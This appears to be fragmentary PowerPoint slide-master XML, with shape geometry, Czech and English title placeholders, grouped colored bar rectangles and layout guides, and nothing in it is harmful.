              <a:off x="5774" y="1153"/>
              <a:ext cx="5" cy="2"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 4"/>
                <a:gd name="T1" fmla="*/ 0 h 2"/>
                <a:gd name="T2" fmla="*/ 3 w 4"/>
                <a:gd name="T3" fmla="*/ 1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1"/>
                    <a:pt x="3" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1"/>
                    <a:pt x="3" y="1"/>
                    <a:pt x="4" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="2"/>
                    <a:pt x="3" y="2"/>
                    <a:pt x="2"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5" name="Freeform: Shape 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-2" y="0"/>
            <a:ext cx="6762953" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 7294818"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 7294818 w 7294818"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 5871241 w 7294818"/>
              <a:gd name="connsiteY5" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 4057397 w 7294818"/>
              <a:gd name="connsiteY6" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 3978914 w 7294818"/>
              <a:gd name="connsiteY7" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 729481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4818" h="6858000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3978914" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7294818" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5871241" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4057397" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3978914" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="685800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err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683257" y="1562893"/>
            <a:ext cx="5258796" cy="3732214"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="274320" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="7200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Freeform: Shape 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334508" y="0"/>
            <a:ext cx="1522984" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1319784 w 1522984"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1522984 w 1522984"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 203200 w 1522984"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1522984"/>
              <a:gd name="connsiteY3" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 1319784 w 152298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984" h="6858000">
                <a:moveTo>
                  <a:pt x="1319784" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1522984" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="203200" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1319784" y="0"/>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err="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3440025155"/>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89838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New chapt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99860" y="4003200"/>
            <a:ext cx="4224000" cy="777600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>Nadpis kapitoly</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1416000" y="4684800"/>
            <a:ext cx="6120000" cy="417600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l">
              <a:buNone/>
              <a:defRPr b="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Obrázek 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B386EC6-69C7-4248-9552-3B1FD3E90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5050" y="6356351"/>
            <a:ext cx="1161591" cy="425141"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Obrázek 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02015E9B-EF1A-493A-949B-28CE3BC0A8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000" y="6393599"/>
            <a:ext cx="1488000" cy="342240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Skupina 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5755E40-ED50-487E-80A4-38A4E1E03A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1549035" y="5240135"/>
            <a:ext cx="4703608" cy="55423"/>
            <a:chOff x="1161776" y="3930101"/>
            <a:chExt cx="3527706" cy="41567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6651A73D-4FB8-4AEA-BB80-5682B3354124}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1161776" y="3930103"/>
              <a:ext cx="504000" cy="41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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{742621C4-E327-4FB2-BC04-D015FD039A1C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665776" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>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1" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{567932FD-2B93-47D1-BE84-7E493F18701A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169776" y="3930103"/>
              <a:ext cx="504000" cy="4156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12" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F7E9FAD-D160-4D79-93B6-F1D09D6A8FB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673923" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA529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3" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CD91B13-F11C-451B-86C9-405CCAC156CA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3177776" y="3930102"/>
              <a:ext cx="504000" cy="4156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4" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9CD528A-8F3C-40E8-B82A-CE68FAF3DEE7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3681629" y="3930102"/>
              <a:ext cx="504000" cy="4156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5" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A109D7D-EA60-40AB-8A08-BCC260B64288}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185482" y="3930101"/>
              <a:ext cx="504000" cy="41565"/>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052113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563134"/>
            <a:ext cx="11653523" cy="1158793"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="91440" bIns="91440" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="7058" spc="-98" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Section title</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE87A1ED-A21F-400C-BBE4-2677EA72DC7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="13716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3CD0CA7D-AA89-48BD-B9E8-B5E9263DA68F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1422400"/>
            <a:ext cx="12192000" cy="508000"/>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BDB7E37D-7BB1-41F5-8A21-46A55C30C581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="5130800"/>
            <a:ext cx="12192000" cy="1727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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{345EC240-9C6E-4DD3-A674-4474040A55B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="4914900"/>
            <a:ext cx="12192000" cy="165100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="35353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14D16B08-CA74-4C91-A309-ECE2CC0E895D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="0" y="4749800"/>
            <a:ext cx="12192000" cy="635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01806949"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:extLst>
    <p:ext uri="{DCECCB84-F9BA-43D5-87BE-67443E8EF086}">
      <p15:sldGuideLst xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main">
        <p15:guide id="1" orient="horz" pos="2688">
          <p15:clr>
            <a:srgbClr val="FBAE40"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="216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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Skupina 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE4F378D-2FD4-4185-AED3-A7E4907352D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7488392" y="0"/>
            <a:ext cx="4703608" cy="55423"/>
            <a:chOff x="1161776" y="3930101"/>
            <a:chExt cx="3527706" cy="41567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36AF61A6-1932-4AF9-A4AE-72FFE3E3106E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1161776" y="3930103"/>
              <a:ext cx="504000" cy="41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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{284EC409-F250-477E-9C69-CD8A6FE0B201}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665776" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>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5" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D95A5BC-CA7F-4842-B055-F817476F1429}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169776" y="3930103"/>
              <a:ext cx="504000" cy="4156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16" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9004FCD-03E7-4723-9DF6-725147263EE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673923" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA529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7" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3C11AC4-E72D-432F-B133-FECB98EF67D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3177776" y="3930102"/>
              <a:ext cx="504000" cy="4156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8" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{142EC24B-C429-4387-B450-E6ED89CECD6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3681629" y="3930102"/>
              <a:ext cx="504000" cy="4156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9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2FEEA8F-608C-4A05-8DA8-38D4367FA3CF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185482" y="3930101"/>
              <a:ext cx="504000" cy="41565"/>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4343653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8"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Skupina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B5E5195-E383-4800-95CE-75CD00CB833E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7488392" y="0"/>
            <a:ext cx="4703608" cy="55423"/>
            <a:chOff x="1161776" y="3930101"/>
            <a:chExt cx="3527706" cy="41567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B950FC28-0091-4481-9CC6-123A9F0B1D51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1161776" y="3930103"/>
              <a:ext cx="504000" cy="41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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67F89AE-1774-478C-89DF-13283F0873A6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665776" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>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0" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E22B0C88-9DA9-483D-A4F4-0D4DC44E5E49}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169776" y="3930103"/>
              <a:ext cx="504000" cy="4156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11" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DDB6019-D8FF-4746-9E86-602CF631FCC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673923" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA529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Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E7EF41A-B80E-4592-9CAF-F881A6CDB101}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3177776" y="3930102"/>
              <a:ext cx="504000" cy="4156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3" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCE12890-A70D-4A5D-8325-A223BD74F508}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3681629" y="3930102"/>
              <a:ext cx="504000" cy="4156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4" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5DA6284-9602-44C1-85CC-64FDDCC51A6B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4185482" y="3930101"/>
              <a:ext cx="504000" cy="41565"/>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18188767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133"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133"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1867"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1467"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="14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133"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133"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1867"/>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1467"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="14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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Skupina 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16A0E8C1-3FC8-4730-9B9C-48AE5B5ABBE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7488392" y="0"/>
            <a:ext cx="4703608" cy="55423"/>
            <a:chOff x="1161776" y="3930101"/>
            <a:chExt cx="3527706" cy="41567"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{899587AD-C77C-4CC6-8FA6-E468A06D32C8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1161776" y="3930103"/>
              <a:ext cx="504000" cy="41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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7D1B6E5-1886-40AC-A1AE-FD4BEE1D9430}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1665776" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>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2" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA7CB0A2-0E20-422A-AA66-8E6116FFBFB6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2169776" y="3930103"/>
              <a:ext cx="504000" cy="4156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13" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46C00936-BF67-4128-8D2B-465BE5AE784A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673923" y="3930103"/>
              <a:ext cx="504000" cy="41565"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EA529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4" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CD2571C-F23C-4BAB-80C3-EAC47FCE8F79}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
